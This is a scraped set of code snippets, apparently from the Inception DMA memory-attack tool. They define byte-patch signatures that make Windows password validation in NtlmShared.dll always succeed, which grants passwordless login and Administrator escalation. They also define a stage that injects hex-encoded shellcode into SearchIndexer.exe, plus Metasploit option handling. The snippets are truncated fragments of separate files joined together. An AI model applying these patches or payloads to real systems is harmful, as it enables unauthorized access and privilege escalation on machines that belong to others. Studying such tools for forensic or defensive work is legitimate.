Esempio n. 1
from inception import memory
from inception.interfaces import file as interface
from inception.memory import Target, Signature, Chunk

# Target template
targets = [
    Target(name='find',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
                         md5=None,
                         tag=False,
                         offsets=[0x2a0],
                         chunks=[
                             Chunk(chunk=0x9782440e1b5939ff,
                                   chunkoffset=0x00,
                                   patch=0x00,
                                   patchoffset=0x00)
                         ])
           ]),
    Target(name='findall',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
Esempio n. 2
targets = [
    Target(
        name='Windows 10 MsvpPasswordValidate unlock/privilege escalation',
        note='Ensures that the password-check always returns true. This will '
        'cause all accounts to no longer require a password, and will '
        'also allow you to escalate privileges to Administrator via the '
        '\'runas\' command.',
        signatures=[
            Signature(os='Windows 10',
                      os_versions=['10.0'],
                      os_architectures=['x64'],
                      executable='NtlmShared.dll',
                      version=None,
                      md5=None,
                      tag=False,
                      offsets=[0x14f],
                      chunks=[
                          Chunk(chunk=0xc60f84,
                                chunkoffset=0x00,
                                patch=0xb001,
                                patchoffset=0x07)
                      ])
        ]),
    Target(
        name='Windows 8 MsvpPasswordValidate unlock/privilege escalation',
        note='Ensures that the password-check always returns true. This will '
        'cause all accounts to no longer require a password, and will '
        'also allow you to escalate privileges to Administrator via the '
        '\'runas\' command.',
        signatures=[
            Signature(os='Windows 8',
Esempio n. 3
    b'\x5c\x53\x65\x61\x72\x63\x68\x49\x6e\x64\x65\x78\x65\x72' +
    b'\x2e\x65\x78\x65\x7c\x53\x76\x63\x3d\x57\x53\x65\x61\x72' +
    b'\x63\x68\x7c\x4e\x61\x6d\x65\x3d\x53\x65\x61\x72\x63\x68' +
    b'\x49\x6e\x64\x65\x78\x65\x72\x2d\x32\x7c\x22\x22\x00'
}

# stage1: one Target holding a single Signature for SearchIndexer.exe on
# Windows 7 SP1 (x86).  Its only Chunk pairs the pattern 0x8bff558bec813D,
# listed under offsets=[0x18c], with shellcode['alloc_page'] as the patch.
# NOTE(review): how offsets, chunkoffset and patchoffset are interpreted is
# decided by the Signature/Chunk classes, which are not visible here.
# NOTE(review): version and md5 are empty strings; presumably the signature
# is not pinned to one build of the executable -- confirm against the matcher.
stage1 = Target(
    name='Allocate page',
    note='Create page, copy signature to it and jump to page',
    signatures=[
        Signature(
            # Platform and executable this signature applies to.
            os='Windows 7',
            os_versions=['SP1'],
            os_architectures=['x86'],
            executable='SearchIndexer.exe',
            version='',
            md5='',
            tag=False,
            # Where the pattern is expected and what replaces it.
            offsets=[0x18c],
            chunks=[
                Chunk(
                    chunk=0x8bff558bec813D,
                    chunkoffset=0,
                    patch=shellcode['alloc_page'],
                    patchoffset=0,
                ),
            ],
        ),
    ],
)


def add_options(group):
    group.add_option('--msfopts',
                     dest='msfopts',
                     help='exploit options in a comma-separated list using '
                     'the format \'OPTION=value\'')
    group.add_option('--msfpw',